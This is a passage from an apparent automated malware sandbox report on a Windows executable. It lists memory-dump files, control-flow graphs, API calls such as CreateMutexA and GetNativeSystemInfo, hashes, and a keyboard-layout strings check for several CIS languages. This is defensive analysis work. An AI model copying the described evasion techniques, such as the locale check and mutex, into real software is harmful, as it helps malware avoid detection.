                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$bZ+,$bZ+,
                                                                                                                                                                                                                                                  • API String ID: 0-137358041
                                                                                                                                                                                                                                                  • Opcode ID: 3324ec2af0b275e15e0e5754ffc07c44560177033cb71e13dbe9fb2c3eab0f97
                                                                                                                                                                                                                                                  • Instruction ID: 902c2279b0f09d769056f44062a07ed0f0497ff462a26795cd28461590d591eb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3324ec2af0b275e15e0e5754ffc07c44560177033cb71e13dbe9fb2c3eab0f97
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14F1F47090025CABEB24DF54CC84BDEBBB9EF44314F5042A9F808E7281DB749A88DF91
                                                                                                                                                                                                                                                  Function 00F37D30 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 330 f37d30-f37db2 call f640f0 334 f38356-f38373 call f4cff1 330->334 335 f37db8-f37de0 call f47a00 call f35c10 330->335 342 f37de2 335->342 343 f37de4-f37e06 call f47a00 call f35c10 335->343 342->343 348 f37e0a-f37e23 343->348 349 f37e08 343->349 352 f37e25-f37e34 348->352 353 f37e54-f37e7f 348->353 349->348 354 f37e36-f37e44 352->354 355 f37e4a-f37e51 call f4d663 352->355 356 f37e81-f37e90 353->356 357 f37eb0-f37ed1 353->357 354->355 358 f38374 call f66c6a 354->358 355->353 360 f37e92-f37ea0 356->360 361 f37ea6-f37ead call f4d663 356->361 362 f37ed3-f37ed5 GetNativeSystemInfo 357->362 363 f37ed7-f37edc 357->363 371 f38379-f3837f call f66c6a 358->371 360->358 360->361 361->357 364 f37edd-f37ee6 362->364 363->364 369 f37f04-f37f07 364->369 370 f37ee8-f37eef 364->370 375 f382f7-f382fa 369->375 376 f37f0d-f37f16 369->376 373 f38351 370->373 374 f37ef5-f37eff 370->374 373->334 378 f3834c 374->378 375->373 381 f382fc-f38305 375->381 379 f37f29-f37f2c 376->379 380 f37f18-f37f24 376->380 378->373 383 f37f32-f37f39 379->383 384 f382d4-f382d6 379->384 380->378 385 f38307-f3830b 381->385 386 f3832c-f3832f 381->386 389 f38019-f382bd call f47a00 call f35c10 call f47a00 call f35c10 call f35d50 call f47a00 call f35c10 call f35730 call f47a00 call f35c10 call f47a00 call f35c10 call f35d50 call f47a00 call f35c10 call f35730 call f47a00 call f35c10 call f47a00 call f35c10 call f35d50 call f47a00 call f35c10 call f35730 call f47a00 call f35c10 call f47a00 call f35c10 call f35d50 call f47a00 call f35c10 call f35730 383->389 390 f37f3f-f37f9b call f47a00 call f35c10 call f47a00 call f35c10 call f35d50 383->390 387 f382e4-f382e7 384->387 388 f382d8-f382e2 384->388 391 f38320-f3832a 385->391 392 f3830d-f38312 385->392 393 f38331-f3833b 386->393 394 f3833d-f38349 386->394 387->373 396 f382e9-f382f5 387->396 388->378 427 f382c3-f382cc 389->427 415 f37fa0-f37fa7 390->415 391->373 392->391 398 f38314-f3831e 392->398 393->373 394->378 396->378 398->373 417 f37fab-f37fcb call f68bbe 415->417 418 f37fa9 415->418 424 f38002-f38004 417->424 425 f37fcd-f37fdc 417->425 418->417 424->427 428 f3800a-f38014 424->428 430 f37ff2-f37fff call f4d663 425->430 431 f37fde-f37fec 425->431 427->375 433 f382ce 427->433 428->427 430->424 431->371 431->430 433->384
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F37ED3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 1721193555-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: 22f0519682b077945b267f229e012aefdd3b4a99763d0f3d5a6eef7a79a78a66
                                                                                                                                                                                                                                                  • Instruction ID: 7a9a008d753b5ad3bbd1f21701aca255091f6e9a099e4884f1eb4ddc97ea62f0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22f0519682b077945b267f229e012aefdd3b4a99763d0f3d5a6eef7a79a78a66
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEE1F971E00744ABDF24BB68CC4B79D7A61AB81734F94069CE815673C2DB399F81A7C2
                                                                                                                                                                                                                                                  Function 00F3B1A0 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 244COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 504 f3b1a0-f3b1ec 544 f3b1ed call 5070b67 504->544 545 f3b1ed call 5070b26 504->545 546 f3b1ed call 5070b14 504->546 547 f3b1ed call 5070b43 504->547 548 f3b1ed call 5070b83 504->548 549 f3b1ed call 5070ba2 504->549 550 f3b1ed call 5070ae2 504->550 551 f3b1ed call 5070af2 504->551 552 f3b1ed call 5070bbd 504->552 553 f3b1ed call 5070a99 504->553 505 f3b1f2-f3b210 506 f3b217-f3b21c 505->506 506->506 507 f3b21e-f3b3cf call f480c0 call f48510 * 2 call f47a00 call f48510 * 3 CoInitialize 506->507 522 f3b3fa-f3b74f 507->522 533 f3b755-f3b761 522->533 534 f3b9c4-f3b9e1 call f4cff1 522->534 535 f3b767-f3b775 533->535 536 f3b9ba-f3b9c1 call f4d663 533->536 535->536 538 f3b9e2-f3b9e7 call f66c6a 535->538 536->534 544->505 545->505 546->505 547->505 548->505 549->505 550->505 551->505 552->505 553->505
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F3B3C7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID: bZ+,
                                                                                                                                                                                                                                                  • API String ID: 2538663250-2515065464
                                                                                                                                                                                                                                                  • Opcode ID: c125e6900ca403f7f16fd8556f32a5646c28b55c2ae0cd16a2a3b922bd9587f4
                                                                                                                                                                                                                                                  • Instruction ID: d49a82e391f8eb51e4a28bfea0145da52ba3cb240bd1c23923c254910371b948
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c125e6900ca403f7f16fd8556f32a5646c28b55c2ae0cd16a2a3b922bd9587f4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28B12870A10268DFEB29CF14CCA5BDEBBB5EF05304F5081D9E90967281D775AA88CF90
                                                                                                                                                                                                                                                  Function 00F39BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 554 f39ba5-f39d91 call f47a00 call f35c10 call f38b30 call f48220
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
